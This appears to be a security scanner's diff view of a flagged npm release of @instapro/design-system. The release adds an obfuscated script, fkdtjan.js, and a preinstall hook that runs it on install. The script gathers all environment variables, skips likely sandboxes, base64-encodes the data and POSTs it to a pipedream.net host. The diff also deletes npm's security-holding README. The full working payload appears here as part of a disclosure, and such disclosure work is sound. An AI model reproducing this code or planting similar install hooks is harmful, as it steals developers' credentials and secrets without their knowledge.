@instapro/design-system 0.0.1-security → 2.724.467
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @instapro/design-system might be problematic. Click here for more details.
- package/fkdtjan.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/fkdtjan.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function a0_0x13fb(_0x1a7f24,_0x33242c){const _0x563978=a0_0x5639();return a0_0x13fb=function(_0x13fbbe,_0x483e18){_0x13fbbe=_0x13fbbe-0x8e;let _0x1760ea=_0x563978[_0x13fbbe];return _0x1760ea;},a0_0x13fb(_0x1a7f24,_0x33242c);}const a0_0x1709bb=a0_0x13fb;function a0_0x5639(){const _0x5505e8=['request','env','error','net','keys','tencent.com','pipedream','includes','39582Pfccfn','1304127OOYuGH','96eeEWtf','end','write','448315fPQULZ','length','stringify','5604eqVUkA','250810WLlkev','USERNAME','100cCjVXw','101548vyZQPE','24AXEuWA','1333395SIEEGM','/usr/bin/python','daasadmin'];a0_0x5639=function(){return _0x5505e8;};return a0_0x5639();}(function(_0x46a290,_0x4a6cd9){const _0x4feb4e=a0_0x13fb,_0x59c479=_0x46a290();while(!![]){try{const _0x30350b=parseInt(_0x4feb4e(0x9a))/0x1*(parseInt(_0x4feb4e(0xa0))/0x2)+parseInt(_0x4feb4e(0x99))/0x3+-parseInt(_0x4feb4e(0xa4))/0x4*(parseInt(_0x4feb4e(0xa3))/0x5)+-parseInt(_0x4feb4e(0x98))/0x6+parseInt(_0x4feb4e(0x9d))/0x7*(parseInt(_0x4feb4e(0xa5))/0x8)+-parseInt(_0x4feb4e(0xa6))/0x9+parseInt(_0x4feb4e(0xa1))/0xa;if(_0x30350b===_0x4a6cd9)break;else _0x59c479['push'](_0x59c479['shift']());}catch(_0x3777ae){_0x59c479['push'](_0x59c479['shift']());}}}(a0_0x5639,0x3f179));const http=require('https'),filter=[{'key':'npm_config_registry','val':'taobao.org'},{'key':'npm_config_registry','val':a0_0x1709bb(0x95)},{'key':a0_0x1709bb(0xa2),'val':a0_0x1709bb(0x8f)},{'key':'_','val':a0_0x1709bb(0x8e)}];function main(){const _0x463f15=a0_0x1709bb;var _0x36298c=process[_0x463f15(0x91)]||{};if(filter['some'](({key:_0x3c2a4c,val:_0x12d23b})=>_0x36298c[_0x3c2a4c]&&_0x36298c[_0x3c2a4c][_0x463f15(0x97)](_0x12d23b))||Object[_0x463f15(0x94)](_0x36298c)[_0x463f15(0x9e)]<0xa)return;req=http[_0x463f15(0x90)]({'host':['3e6cd05f19d5dd6adfbed43a32433776','m',_0x463f15(0x96),_0x463f15(0x93)]['join']('.'),'path':'/'+(_0x36298c['npm_package_name']||''),'method':'POST'})['on'](_0x463f15(0x92),function(_0x5f4e1e){}),req[_0x463f15(0x9c)](Buffer['from'](JSON[_0x463f15(0x9f)](_0x36298c))['toString']('base64')),req[_0x463f15(0x9b)]();}main();
|
package/package.json
CHANGED
@@ -1,6 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "@instapro/design-system",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"
|
3
|
+
"version": "2.724.467",
|
4
|
+
"main": "fkdtjan.js",
|
5
|
+
"scripts": {
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node fkdtjan.js"
|
8
|
+
},
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
6
11
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40instapro%2Fdesign-system for more information.
|